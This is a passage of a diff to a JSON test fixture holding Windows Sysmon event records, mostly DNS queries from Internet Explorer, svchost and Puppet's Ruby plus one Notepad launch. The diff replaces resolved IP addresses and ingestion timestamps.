Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:21.552Z", @@ -20623,12 +20351,12 @@ "type": "CNAME" }, { - "data": "72.21.81.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "network": { @@ -20645,13 +20373,13 @@ "iecvlist.microsoft.com" ], "ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742643900Z", + "ingested": "2021-12-09T13:50:23.457681700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:33.148Z", @@ -20715,12 +20443,12 @@ "type": "CNAME" }, { - "data": "40.77.232.95", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "network": { @@ -20736,13 +20464,13 @@ "tsfe.trafficshaping.dsp.mp.microsoft.com" ], "ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742652300Z", + "ingested": "2021-12-09T13:50:23.457687400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:39:03.685Z", @@ -20814,7 +20542,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742660800Z", + "ingested": "2021-12-09T13:50:23.457693200Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:22.432153100Z'/\u003e\u003cEventRecordID\u003e221\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:20.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003eisatap.local.crowbird.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -20885,7 +20613,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742669400Z", + "ingested": "2021-12-09T13:50:23.457699Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:42.554539300Z'/\u003e\u003cEventRecordID\u003e230\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:40.504\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e9f7-5d2f-0000-001031039c00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e676\u003c/Data\u003e\u003cData Name='QueryName'\u003epuppet\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -20956,7 +20684,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742677900Z", + "ingested": "2021-12-09T13:50:23.457704800Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:40:42.447293700Z'/\u003e\u003cEventRecordID\u003e231\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:40:40.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-001016f70000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e636\u003c/Data\u003e\u003cData Name='QueryName'\u003ewpad\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21030,12 +20758,12 @@ "type": "CNAME" }, { - "data": "65.55.44.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "network": { @@ -21053,13 +20781,13 @@ "v10.vortex-win.data.microsoft.com" ], "ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742686300Z", + "ingested": "2021-12-09T13:50:23.457710500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:42:55.556Z", @@ -21123,12 +20851,12 @@ "type": "CNAME" }, { - "data": "20.36.218.63", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "network": { @@ -21144,13 +20872,13 @@ "settings-win.data.microsoft.com" ], "ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742695Z", + "ingested": "2021-12-09T13:50:23.457716100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:43:06.459Z", @@ -21246,7 +20974,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742703400Z", + "ingested": "2021-12-09T13:50:23.457721900Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-27T20:00:14.324234100Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='7144' ThreadID='6876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-27 20:00:14.320\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-7c4e-5f98-5803-000000000500}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\notepad.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.475 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eNotepad\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eNOTEPAD.EXE\u003c/Data\u003e\u003cData Name='CommandLine'\u003e\"C:\\Windows\\system32\\notepad.exe\" \u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Users\\vagrant\\\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT\\vagrant\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{9f32b55f-6fdd-5f98-e7c9-020000000000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x2c9e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e1\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eMedium\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=B6D237154F2E528F0B503B58B025862D66B02B73\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{9f32b55f-6fdf-5f98-7000-000000000500}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e4212\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\explorer.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21302,7 +21030,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-06-14T13:23:14.742712100Z", + "ingested": "2021-12-09T13:50:23.457727800Z", "code": "25", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e25\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e25\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T14:43:23.551269400Z'/\u003e\u003cEventRecordID\u003e10737797\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='5080'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity 